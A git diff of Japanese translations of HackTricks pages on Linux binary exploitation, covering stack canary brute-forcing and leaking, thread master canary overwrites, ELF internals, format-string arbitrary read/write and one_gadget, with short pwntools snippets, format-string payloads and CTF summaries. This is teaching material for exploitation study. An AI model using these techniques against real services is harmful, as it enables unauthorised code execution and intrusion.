-ウェブサーバーが `fork()` を使用すると、canary バイトをバイト単位で推測するためのブルートフォース攻撃が可能になります。しかし、`fork()` の後に `execve()` を使用するとメモリ空間が上書きされ、攻撃が無効になります。`vfork()` は、子プロセスが書き込みを試みるまで複製なしで実行できるため、プロセス作成とメモリ処理に対する異なるアプローチを提供します。
+ウェブサーバーが `fork()` を使用すると、canary バイトをバイト単位で推測するブルートフォース攻撃が可能になります。しかし、`fork()` の後に `execve()` を使用するとメモリ空間が上書きされ、攻撃が無効になります。`vfork()` は、子プロセスが書き込みを試みるまで複製なしで実行できるため、プロセス作成とメモリ処理に対する異なるアプローチを提供します。
 
 ### 長さ
 
@@ -29,7 +29,7 @@
 
 ## バイパス
 
-**canary を漏洩させ**、その後自分の値で上書きします（例：バッファオーバーフロー）。
+**canary を漏洩させて**、その後自分の値で上書きする（例：バッファオーバーフロー）。
 
 - **子プロセスで canary がフォークされる場合**、1 バイトずつ **ブルートフォース** することが可能かもしれません：
 
@@ -43,7 +43,7 @@ bf-forked-stack-canaries.md
 print-stack-canary.md
 {{#endref}}
 
-- **スタックに保存されたポインタを上書きする**
+- **スタックに保存されたポインタの上書き**
 
 スタックがスタックオーバーフローに脆弱な場合、**上書き可能な文字列や関数へのアドレスを含む可能性があります**。これにより、スタック canary に到達することなく脆弱性を悪用できます。確認してください：
 
@@ -51,11 +51,11 @@ print-stack-canary.md
 ../../stack-overflow/pointer-redirecting.md
 {{#endref}}
 
-- **マスターとスレッドの canary の両方を変更する**
+- **マスターとスレッドの canary の両方を変更**
 
 canary で保護されたスレッド関数のバッファオーバーフローを使用して、スレッドのマスター canary を変更できます。その結果、チェックが同じ（ただし変更された）2 つの canary で使用されるため、緩和策は無意味になります。
 
-- **`__stack_chk_fail` の GOT エントリを変更する**
+- **`__stack_chk_fail` の GOT エントリを変更**
 
 バイナリが Partial RELRO を持っている場合、任意の書き込みを使用して `__stack_chk_fail` の GOT エントリをダミー関数に変更し、canary が変更されてもプログラムがブロックされないようにできます。
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
index 20e6e635d..875c994ea 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
@@ -1,4 +1,4 @@
-# BF Forked & Threaded Stack Canaries
+# BFフォークおよびスレッドスタックカナリア
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
@@ -7,14 +7,14 @@
 ![](<../../../../images/image (144).png>)
 
 > [!NOTE]
-> **`checksec`** がバイナリがカナリアによって保護されていることを見つけられない場合があります。これは静的にコンパイルされており、関数を特定できないためです。\
-> ただし、関数呼び出しの最初にスタックに値が保存され、その値が終了前にチェックされるのを見つけることで、手動で気づくことができます。
+> **`checksec`** は、バイナリがカナリアによって保護されていることを見つけられない場合があります。これは静的にコンパイルされており、関数を特定できないためです。\
+> ただし、関数呼び出しの最初にスタックに値が保存され、その値が終了前にチェックされることを見つけることで、手動で気づくことができます。
 
 ## ブルートフォースカナリア
 
 単純なカナリアをバイパスする最良の方法は、バイナリが**新しい接続を確立するたびに子プロセスをフォークするプログラム**である場合です（ネットワークサービス）。なぜなら、接続するたびに**同じカナリアが使用されるからです**。
 
-したがって、カナリアをバイパスする最良の方法は、**文字ごとにブルートフォースすること**です。そして、推測したカナリアバイトが正しいかどうかは、プログラムがクラッシュしたか、通常のフローを続けているかを確認することで判断できます。この例では、関数は**8バイトのカナリア（x64）をブルートフォースし**、正しく推測されたバイトと不正なバイトを**チェック**することで区別します。サーバーから**レスポンス**が返されるかどうかを確認します（**他の状況**では**try/except**を使用することもできます）：
+したがって、カナリアをバイパスする最良の方法は、**文字ごとにブルートフォースすること**です。そして、推測したカナリアバイトが正しいかどうかは、プログラムがクラッシュしたか、通常のフローを続けているかを確認することで判断できます。この例では、関数は**8バイトのカナリア（x64）をブルートフォースし**、正しく推測されたバイトと不正なバイトを**チェック**することで区別します。サーバーから**レスポンス**が返されるかどうかを確認します（**他の状況**では、**try/except**を使用することもできます）：
 
 ### 例1
 
@@ -103,13 +103,13 @@ log.info(f"The canary is: {canary}")
 ```
 ## スレッド
 
-同じプロセスのスレッドは**同じカナリアトークンを共有**するため、バイナリが攻撃のたびに新しいスレッドを生成する場合、カナリアを**ブルートフォース**することが可能です。&#x20;
+同じプロセスのスレッドは**同じカナリアトークンを共有する**ため、バイナリが攻撃のたびに新しいスレッドを生成する場合、カナリアを**ブルートフォース**することが可能です。&#x20;
 
-カナリアで保護されたスレッド関数におけるバッファオーバーフローは、プロセスのマスターカナリアを変更するために使用できます。その結果、チェックは同じ（変更された）2つのカナリアを使用するため、緩和策は無意味になります。
+カナリアで保護されたスレッド関数におけるバッファオーバーフローは、プロセスのマスターカナリアを変更するために使用できます。その結果、チェックは同じ（ただし変更された）2つのカナリアで使用されるため、緩和策は無意味です。
 
 ### 例
 
-次のプログラムはバッファオーバーフローに対して脆弱ですが、カナリアでコンパイルされています：
+次のプログラムはバッファオーバーフローに対して脆弱ですが、カナリアでコンパイルされています:
 ```c
 #include <pthread.h>
 #include <stdlib.h>
@@ -136,7 +136,7 @@ pthread_join(thread, NULL);
 return 0;
 }
 ```
-`vuln`がスレッド内で呼び出されていることに注意してください。GDBでは、プログラムが入力データを読み取るために`gets`を呼び出すポイント、具体的には`vuln`を確認できます。
+`vuln`がスレッド内で呼び出されていることに注意してください。GDBでは、`vuln`を確認できます。特に、プログラムが入力データを読み取るために`gets`を呼び出すポイントを見てみましょう：
 ```bash
 gef> break gets
 Breakpoint 1 at 0x4010a0
@@ -169,7 +169,7 @@ Start              End                Size               Offset             Perm
 0x00007ffff7580000 0x00007ffff7d83000 0x0000000000803000 0x0000000000000000 rw- <tls-th1><stack-th2>  <-  $rbx, $rsp, $rbp, $rsi, $rdi, $r12
 0x00007ffffffde000 0x00007ffffffff000 0x0000000000021000 0x0000000000000000 rw- [stack]  <-  $r9, $r15
 ```
-スレッドのスタックは、マスターカナリアが保存されているスレッドローカルストレージ（TLS）の上に配置されます：
+スレッドのスタックは、マスターカナリアが保存されているスレッドローカルストレージ（TLS）の上に配置されます。
 ```bash
 gef> tls
 $tls = 0x7ffff7d7f640
@@ -186,7 +186,7 @@ $tls = 0x7ffff7d7f640
 ...
 ```
 > [!NOTE]
-> 上記のGDB関数のいくつかは、通常の [hugsy/gef](https://github.com/hugsy/gef) よりも多くの機能を持つ [bata24/gef](https://github.com/bata24/gef) という拡張に定義されています。
+> 上記のGDB関数のいくつかは、通常の[hugsy/gef](https://github.com/hugsy/gef)よりも多くの機能を持つ[bata24/gef](https://github.com/bata24/gef)という拡張に定義されています。
 
 その結果、大きなバッファオーバーフローにより、スタックカナリアとTLS内のマスターカナリアの両方を変更することができます。これがオフセットです：
 ```bash
@@ -215,4 +215,4 @@ io.interactive()
 - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html)
 - 64ビット、PIEなし、nx、BFカナリア、`execve`を呼び出すROPをメモリに書き込み、そこにジャンプします。
 - [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads)
-- 64ビット、PIEなし、nx、スレッドとマスターカナリアを変更します。
+- 64ビット、PIEなし、nx、スレッドとマスターカナリアを修正します。
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
index 7721cc2e2..24f80fc4e 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
@@ -1,25 +1,25 @@
-# スタックカナリーの印刷
+# スタックカナリの印刷
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
 ## 印刷されたスタックの拡大
 
-スタックオーバーフローに**脆弱なプログラム**が**スタックオーバーフロー**の**一部**を指す**puts**関数を実行できる状況を想像してください。攻撃者は**カナリーの最初のバイトがヌルバイト**（`\x00`）であり、残りのカナリーは**ランダム**なバイトであることを知っています。次に、攻撃者は**カナリーの最初のバイト**までスタックを**上書きする**オーバーフローを作成することができます。
+スタックオーバーフローに**脆弱なプログラム**が**スタックオーバーフロー**の**一部**を指す**puts**関数を実行できる状況を想像してください。攻撃者は**カナリの最初のバイトがヌルバイト**（`\x00`）であり、残りのカナリは**ランダム**なバイトであることを知っています。次に、攻撃者は**カナリの最初のバイト**までスタックを**上書きする**オーバーフローを作成することができます。
 
-その後、攻撃者はペイロードの中間で**puts機能**を呼び出し、**カナリーのすべて**（最初のヌルバイトを除く）を**印刷**します。
+その後、攻撃者はペイロードの中間で**puts機能**を呼び出し、**カナリ全体**を**印刷**します（最初のヌルバイトを除く）。
 
-この情報を使って、攻撃者は**カナリーを知っている**（同じプログラムセッション内で）新しい攻撃を**作成して送信**することができます。
+この情報を使って、攻撃者は**カナリを知っている**（同じプログラムセッション内で）新しい攻撃を**作成して送信**することができます。
 
-明らかに、この戦術は非常に**制限されて**おり、攻撃者は**カナリー**を**抽出**するために自分の**ペイロードの内容**を**印刷**できる必要があります。そして、**新しいペイロード**（**同じプログラムセッション**内で）を作成し、**実際のバッファオーバーフロー**を**送信**できる必要があります。
+明らかに、この戦術は非常に**制限されており**、攻撃者は**カナリ**を**抽出**するために自分の**ペイロードの内容**を**印刷**できる必要があり、その後**新しいペイロード**を作成し（**同じプログラムセッション内で**）、**実際のバッファオーバーフロー**を**送信**できる必要があります。
 
 **CTFの例:**&#x20;
 
 - [**https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html**](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
-- 64ビット、ASLRが有効ですがPIEはなし、最初のステップはカナリーのバイト0x00までオーバーフローを埋めてからputsを呼び出して漏洩させることです。カナリーを使ってROPガジェットを作成し、putsを呼び出してGOTからputsのアドレスを漏洩させ、次に`system('/bin/sh')`を呼び出すROPガジェットを作成します。
+- 64ビット、ASLRが有効ですがPIEはなし、最初のステップはカナリのバイト0x00までオーバーフローを埋めてからputsを呼び出して漏洩させることです。カナリを使ってROPガジェットを作成し、putsを呼び出してGOTからputsのアドレスを漏洩させ、次に`system('/bin/sh')`を呼び出すROPガジェットを作成します。
 
 ## 任意の読み取り
 
-フォーマット**文字列**によって提供される任意の読み取りを使用すると、カナリーを漏洩させることができるかもしれません。この例を確認してください: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) そして、任意のメモリアドレスを読み取るためにフォーマット文字列を悪用することについては以下を参照してください:
+フォーマット**文字列**によって提供される任意の読み取りを使用すると、カナリを漏洩させることができるかもしれません。この例を確認してください: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) そして、任意のメモリアドレスを読み取るためにフォーマット文字列を悪用することについては:
 
 {{#ref}}
 ../../format-strings/
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md
index b3ed6491b..d637e42a9 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md
@@ -4,11 +4,11 @@
 
 ## リモートエクスプロイトにおけるFD
 
-例えば、**`system('/bin/sh')`**を呼び出すエクスプロイトをリモートサーバーに送信すると、これはサーバープロセスで実行され、`/bin/sh`はstdinからの入力を期待し（FD: `0`）、stdoutとstderrに出力を印刷します（FDs `1` と `2`）。したがって、攻撃者はシェルと対話することができません。
+例えば、**`system('/bin/sh')`**を呼び出すエクスプロイトをリモートサーバーに送信すると、これはサーバープロセス内で実行され、`/bin/sh`はstdinからの入力を期待し（FD: `0`）、stdoutとstderrに出力を印刷します（FDs `1` と `2`）。したがって、攻撃者はシェルと対話することができません。
 
-これを修正する方法は、サーバーが起動したときに**FD番号 `3`**（リスニング用）を作成し、その後、あなたの接続が**FD番号 `4`**になると仮定することです。したがって、syscall **`dup2`**を使用してstdin（FD 0）とstdout（FD 1）をFD 4（攻撃者の接続のもの）に複製することが可能であり、これによりシェルが実行されたときに連絡を取ることが可能になります。
+これを修正する方法は、サーバーが起動したときに**FD番号 `3`**（リスニング用）を作成し、その後、あなたの接続が**FD番号 `4`**になると仮定することです。したがって、syscall **`dup2`**を使用してstdin（FD 0）とstdout（FD 1）をFD 4（攻撃者の接続のもの）に複製することが可能であり、シェルが実行されるときに接触できるようになります。
 
-[**ここからエクスプロイトの例**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):
+[**ここからのエクスプロイトの例**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):
 ```python
 from pwn import *
 
@@ -27,9 +27,9 @@ p.interactive()
 ```
 ## Socat & pty
 
-socatはすでに`stdin`と`stdout`をソケットに転送します。ただし、`pty`モードは**DELETE文字を含みます**。したがって、`\x7f`（`DELETE` -）を送信すると、**あなたのエクスプロイトの前の文字を削除します**。
+socatはすでに`stdin`と`stdout`をソケットに転送することに注意してください。しかし、`pty`モードは**DELETE文字を含みます**。したがって、`\x7f`（`DELETE` -）を送信すると、**あなたのエクスプロイトの前の文字を削除します**。
 
-これを回避するために、**エスケープ文字`\x16`を送信する任意の`\x7f`の前に追加する必要があります。**
+これを回避するために、**エスケープ文字`\x16`を送信する任意の`\x7f`の前に追加する必要があります**。
 
 **ここでこの動作の例を** [**見つけることができます**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**。**
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
index 2526f38c1..ef2f3d7c3 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
@@ -4,7 +4,7 @@
 
 ## プログラムヘッダー
 
-ローダーにELFをメモリにロードする方法を説明します:
+ELFをメモリにロードする方法をローダーに説明します:
 ```bash
 readelf -lW lnstat
 
@@ -37,7 +37,7 @@ Segment Sections...
 07
 08     .init_array .fini_array .dynamic .got
 ```
-前のプログラムには**9つのプログラムヘッダー**があり、**セグメントマッピング**は**各セクションがどのプログラムヘッダー（00から08まで）に位置するか**を示します。
+前のプログラムには**9つのプログラムヘッダー**があり、**セグメントマッピング**は**各セクションがどのプログラムヘッダー（00から08まで）に位置しているか**を示します。
 
 ### PHDR - プログラムヘッダー
 
@@ -50,9 +50,9 @@ Segment Sections...
 ### LOAD
 
 これらのヘッダーは**バイナリをメモリにロードする方法**を示すために使用されます。\
-各**LOAD**ヘッダーは**メモリ**の領域（サイズ、権限、アライメント）を示し、そこにコピーするELF **バイナリのバイト**を示します。
+各**LOAD**ヘッダーは**メモリ**の領域（サイズ、権限、アライメント）を示し、ELF **バイナリからそこにコピーするバイト**を示します。
 
-例えば、2番目のものはサイズが0x1190で、0x1fc48に位置し、読み取りと書き込みの権限を持ち、オフセット0xfc48から0x528で満たされます（予約されたすべてのスペースを埋めるわけではありません）。このメモリにはセクション`.init_array .fini_array .dynamic .got .data .bss`が含まれます。
+例えば、2番目のものはサイズが0x1190で、0x1fc48に位置し、読み取りと書き込みの権限を持ち、オフセット0xfc48から0x528で満たされます（すべての予約されたスペースを満たすわけではありません）。このメモリにはセクション`.init_array .fini_array .dynamic .got .data .bss`が含まれます。
 
 ### DYNAMIC
 
@@ -68,15 +68,15 @@ Segment Sections...
 
 ### GNU_STACK
 
-スタック実行防止防御の設定を含みます。これが有効な場合、バイナリはスタックからコードを実行できません。
+スタック実行防止防御の構成を含みます。これが有効な場合、バイナリはスタックからコードを実行できません。
 
 ### GNU_RELRO
 
-バイナリのRELRO（Relocation Read-Only）設定を示します。この保護は、プログラムがロードされた後、実行を開始する前に、メモリの特定のセクション（`GOT`や`init`および`fini`テーブルなど）を読み取り専用としてマークします。
+バイナリのRELRO（Relocation Read-Only）構成を示します。この保護は、プログラムがロードされた後、実行を開始する前に、メモリの特定のセクション（`GOT`や`init`および`fini`テーブルなど）を読み取り専用としてマークします。
 
 前の例では、0x1fc48に0x3b8バイトを読み取り専用としてコピーし、セクション`.init_array .fini_array .dynamic .got .data .bss`に影響を与えています。
 
-RELROは部分的または完全であることに注意してください。部分的なバージョンは、**遅延バインディング**に使用され、ライブラリのアドレスを最初に検索する際にこのメモリスペースに**書き込み権限**が必要なセクション**`.plt.got`**を保護しません。
+RELROは部分的または完全であることに注意してください。部分的なバージョンは、**遅延バインディング**に使用され、ライブラリの最初の位置が検索されるときにアドレスを書くために**書き込み権限**を持つ必要がある**`.plt.got`**セクションを保護しません。
 
 ### TLS
 
@@ -145,11 +145,11 @@ CONTENTS, READONLY
 25 .gnu_debuglink 00000034  0000000000000000  0000000000000000  000101bc  2**2
 CONTENTS, READONLY
 ```
-それは、場所、オフセット、権限だけでなく、セクションが持つ**データの種類**も示しています。
+それは、位置、オフセット、権限だけでなく、セクションが持つ**データの種類**も示しています。
 
 ### メタセクション
 
-- **文字列テーブル**: ELFファイルに必要なすべての文字列を含んでいます（ただし、プログラムで実際に使用されるものは含まれていません）。例えば、`.text`や`.data`のようなセクション名が含まれています。そして、文字列テーブルのオフセット45に`.text`がある場合、**name**フィールドには番号**45**が使用されます。
+- **文字列テーブル**: ELFファイルに必要なすべての文字列を含んでいます（ただし、プログラムで実際に使用されるものは含まれていません）。例えば、`.text`や`.data`のようなセクション名が含まれています。そして、`.text`が文字列テーブルのオフセット45にある場合、**name**フィールドには番号**45**が使用されます。
 - 文字列テーブルの場所を見つけるために、ELFは文字列テーブルへのポインタを含んでいます。
 - **シンボルテーブル**: 名前（文字列テーブルのオフセット）、アドレス、サイズ、シンボルに関するその他のメタデータなど、シンボルに関する情報を含んでいます。
 
@@ -164,7 +164,7 @@ CONTENTS, READONLY
 
 ## シンボル
 
-シンボルは、関数、グローバルデータオブジェクト、スレッドローカル変数など、プログラム内の名前付きの場所です。
+シンボルは、プログラム内の名前付きの位置で、関数、グローバルデータオブジェクト、スレッドローカル変数などである可能性があります。
 ```
 readelf -s lnstat
 
@@ -229,11 +229,11 @@ Tag        Type                         Name/Value
 0x000000006ffffff9 (RELACOUNT)          15
 0x0000000000000000 (NULL)               0x0
 ```
-必要なディレクトリは、プログラムが続行するために**言及されたライブラリをロードする必要がある**ことを示しています。必要なディレクトリは、共有**ライブラリが完全に動作し、使用する準備が整った**ときに完了します。
+必要なディレクトリは、プログラムが続行するために**言及されたライブラリをロードする必要がある**ことを示します。必要なディレクトリは、共有**ライブラリが完全に動作し、使用する準備が整った**ときに完了します。
 
 ## 再配置
 
-ローダーは、依存関係をロードした後に再配置を行う必要があります。これらの再配置は、RELまたはRELA形式の再配置テーブルに示され、再配置の数は動的セクションのRELSZまたはRELASZに示されています。
+ローダーは、依存関係をロードした後に再配置を行う必要があります。これらの再配置は、再配置テーブルの形式RELまたはRELAで示され、再配置の数は動的セクションRELSZまたはRELASZで示されます。
 ```
 readelf -r lnstat
 
@@ -308,13 +308,13 @@ Offset          Info           Type           Sym. Value    Sym. Name + Addend
 ```
 ### 静的再配置
 
-もし**プログラムが好ましいアドレス**（通常は0x400000）とは異なる場所にロードされる場合、アドレスがすでに使用されているか、**ASLR**やその他の理由によるものであれば、静的再配置は**ポインタを修正**します。これにより、バイナリが好ましいアドレスにロードされることを期待していた値を持つポインタが修正されます。
+もし**プログラムが好ましいアドレス**（通常は0x400000）とは異なる場所にロードされる場合、アドレスがすでに使用されているか、**ASLR**やその他の理由によるもので、静的再配置は**ポインタを修正**します。これらのポインタは、バイナリが好ましいアドレスにロードされることを期待していた値を持っています。
 
-例えば、`R_AARCH64_RELATIV`型の任意のセクションは、再配置バイアスに加算値を加えたアドレスを修正する必要があります。
+例えば、`R_AARCH64_RELATIV`タイプの任意のセクションは、再配置バイアスに加算値を加えたアドレスを修正する必要があります。
 
 ### 動的再配置とGOT
 
-再配置は外部シンボル（依存関係からの関数など）を参照することもあります。例えば、libCからのmalloc関数です。ローダーはlibCをアドレスにロードする際、malloc関数がロードされている場所を確認し、そのアドレスをGOT（グローバルオフセットテーブル）に書き込みます（再配置テーブルで示される）mallocのアドレスが指定されるべき場所です。
+再配置は外部シンボル（依存関係からの関数など）を参照することもあります。例えば、libCからのmalloc関数です。次に、ローダーはlibCをアドレスにロードする際、malloc関数がロードされている場所を確認し、そのアドレスをGOT（グローバルオフセットテーブル）テーブル（再配置テーブルに示されている）に書き込みます。ここでmallocのアドレスが指定されるべきです。
 
 ### プロシージャリンクテーブル
 
@@ -324,7 +324,7 @@ PLTセクションは遅延バインディングを実行することを可能
 
 ## プログラム初期化
 
-プログラムがロードされた後、実行する時間です。しかし、最初に実行されるコードは**必ずしも`main`**関数ではありません。これは、例えばC++では**グローバル変数がクラスのオブジェクト**である場合、このオブジェクトはmainが実行される**前に**初期化されなければならないためです。
+プログラムがロードされた後、実行する時間です。しかし、最初に実行されるコードは**必ずしも`main`**関数ではありません。これは、例えばC++では**グローバル変数がクラスのオブジェクト**である場合、このオブジェクトはmainが実行される前に**初期化**されなければならないためです。
 ```cpp
 #include <stdio.h>
 // g++ autoinit.cpp -o autoinit
@@ -354,7 +354,7 @@ __attributte__((destructor)) //Add to the destructor list
 ```
 コンパイラの観点から、`main` 関数が実行される前後にこれらのアクションを実行するために、`init` 関数と `fini` 関数を作成することが可能で、これらは動的セクションで **`INIT`** と **`FIN`** として参照され、ELF の `init` および `fini` セクションに配置されます。
 
-他のオプションとして、**`INIT_ARRAY`** および **`FINI_ARRAY`** エントリの **`__CTOR_LIST__`** および **`__DTOR_LIST__`** リストを参照することが挙げられ、これらの長さは **`INIT_ARRAYSZ`** および **`FINI_ARRAYSZ`** によって示されます。各エントリは引数なしで呼び出される関数ポインタです。
+もう一つのオプションは、動的セクションの **`INIT_ARRAY`** および **`FINI_ARRAY`** エントリで **`__CTOR_LIST__`** と **`__DTOR_LIST__`** のリストを参照することで、これらの長さは **`INIT_ARRAYSZ`** と **`FINI_ARRAYSZ`** で示されます。各エントリは引数なしで呼び出される関数ポインタです。
 
 さらに、**`PREINIT_ARRAY`** を持つことも可能で、これは **`INIT_ARRAY`** ポインタの **前に** 実行される **ポインタ** です。
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
index 5393db98d..b851ebbbd 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
@@ -4,9 +4,9 @@
 
 ## 基本情報
 
-Cの**`printf`**は、いくつかの文字列を**出力**するために使用できる関数です。この関数が期待する**最初のパラメータ**は、**フォーマッタを含む生のテキスト**です。**次のパラメータ**として期待されるのは、**生のテキストからフォーマッタを**置き換えるための**値**です。
+Cの**`printf`**は、いくつかの文字列を**印刷**するために使用できる関数です。この関数が期待する**最初のパラメータ**は、**フォーマッタを含む生のテキスト**です。**次のパラメータ**として期待されるのは、**生のテキストからフォーマッタを**置き換えるための**値**です。
 
-脆弱性は、**攻撃者のテキストがこの関数の最初の引数として使用されるとき**に現れます。攻撃者は、**printfフォーマット**文字列の機能を悪用して、**任意のアドレス（読み取り可能/書き込み可能）にある任意のデータを読み書き**するための**特別な入力を作成**することができます。この方法で**任意のコードを実行**することが可能になります。
+脆弱性は、**攻撃者のテキストがこの関数の最初の引数として使用されるとき**に現れます。攻撃者は、**printfフォーマット**文字列の機能を悪用して、**任意のアドレス（読み取り可能/書き込み可能）にある任意のデータを読み書きする**ための**特別な入力を作成**することができます。この方法で**任意のコードを実行**することが可能になります。
 
 #### フォーマッタ:
 ```bash
@@ -56,7 +56,7 @@ printf("$4%x")
 
 ## **任意の読み取り**
 
-フォーマッタ**`$n%s`**を使用して、**`printf`**が**n位置**にある**アドレス**を取得し、それを**文字列として印刷する**ことが可能です（0x00が見つかるまで印刷します）。したがって、バイナリのベースアドレスが**`0x8048000`**であり、ユーザー入力がスタックの4番目の位置から始まることがわかっている場合、次のようにバイナリの先頭を印刷することができます：
+フォーマッタ**`$n%s`**を使用して、**`printf`**が**n位置**にある**アドレス**を取得し、それを**文字列のように印刷する**ことが可能です（0x00が見つかるまで印刷します）。したがって、バイナリのベースアドレスが**`0x8048000`**であり、ユーザー入力がスタックの4番目の位置から始まることがわかっている場合、次のようにバイナリの先頭を印刷することができます：
 ```python
 from pwn import *
 
@@ -74,9 +74,9 @@ log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
 
 ## **任意の書き込み**
 
-フォーマッタ **`$<num>%n`** は、スタック内の\<num>パラメータで指定されたアドレスに**書き込まれたバイト数**を**書き込みます**。攻撃者がprintfを使って任意の数の文字を書き込むことができれば、**`$<num>%n`** を使って任意のアドレスに任意の数を記録することが可能になります。
+フォーマッタ **`$<num>%n`** は、スタック内の\<num>パラメータで指定されたアドレスに**書き込まれたバイト数**を**書き込みます**。攻撃者がprintfを使って任意の数の文字を書き込むことができれば、**`$<num>%n`** を使って任意のアドレスに任意の数を記録することができます。
 
-幸いなことに、9999という数を書くために、入力に9999個の"A"を追加する必要はありません。そのため、フォーマッタ **`%.<num-write>%<num>$n`** を使用して、**`<num-write>`** の数を**`num`位置で指し示されるアドレス**に書き込むことができます。
+幸いなことに、9999という数を書くために、入力に9999個の"A"を追加する必要はありません。そのため、フォーマッタ **`%.<num-write>%<num>$n`** を使用して、**`<num-write>`** の数を**`num`位置で指し示されるアドレス**に書き込むことが可能です。
 ```bash
 AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
 AAAA.%500\$08x —> Param at offset 500
@@ -141,10 +141,10 @@ p.interactive()
 - [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
 - [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
 - [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html)
-- 32ビット、relroなし、canaryなし、nx、pieなし、スタックからフラグを漏洩させるためのフォーマット文字列の基本的な使用（実行フローを変更する必要はありません）
+- 32ビット、relroなし、canaryなし、nx、pieなし、スタックからフラグを漏洩させるためのフォーマット文字列の基本的な使用（実行フローを変更する必要はない）
 - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html)
 - 32ビット、relroあり、canaryなし、nx、pieなし、win関数で`fflush`のアドレスを上書きするためのフォーマット文字列（ret2win）
 - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html)
-- 32ビット、relroあり、canaryなし、nx、pieなし、`.fini_array`内のmainのアドレスに書き込むためのフォーマット文字列（フローがもう1回ループバックするように）および`strlen`を指すGOTテーブル内の`system`へのアドレスを書き込む。フローがmainに戻ると、`strlen`がユーザー入力で実行され、`system`を指すと、渡されたコマンドが実行されます。
+- 32ビット、relroあり、canaryなし、nx、pieなし、`.fini_array`内のmainのアドレスに書き込むためのフォーマット文字列（フローがもう1回ループバックするように）および`strlen`を指すGOTテーブル内の`system`へのアドレスを書き込む。フローがmainに戻ると、`strlen`がユーザー入力で実行され、`system`を指すと、渡されたコマンドが実行される。
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
index 3cb6a889b..7d303d019 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
@@ -5,7 +5,7 @@
 ## 基本情報
 
 [**One Gadget**](https://github.com/david942j/one_gadget) は、**system** と **"/bin/sh"** を使用する代わりにシェルを取得することを可能にします。**One Gadget** は、libcライブラリ内でシェルを取得する方法 (`execve("/bin/sh")`) を1つの**アドレス**を使用して見つけます。\
-しかし、通常はいくつかの制約があり、最も一般的で回避しやすいものは `[rsp+0x30] == NULL` です。あなたは**RSP**内の値を制御しているので、制約を回避するためにいくつかのNULL値を送信するだけです。
+しかし、通常はいくつかの制約があり、最も一般的で回避しやすいものは `[rsp+0x30] == NULL` です。**RSP** 内の値を制御しているため、制約を回避するためにいくつかのNULL値を送信するだけです。
 
 ![](<../../images/image (615).png>)
 ```python
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
index bdbfd2ae7..eafac0e99 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
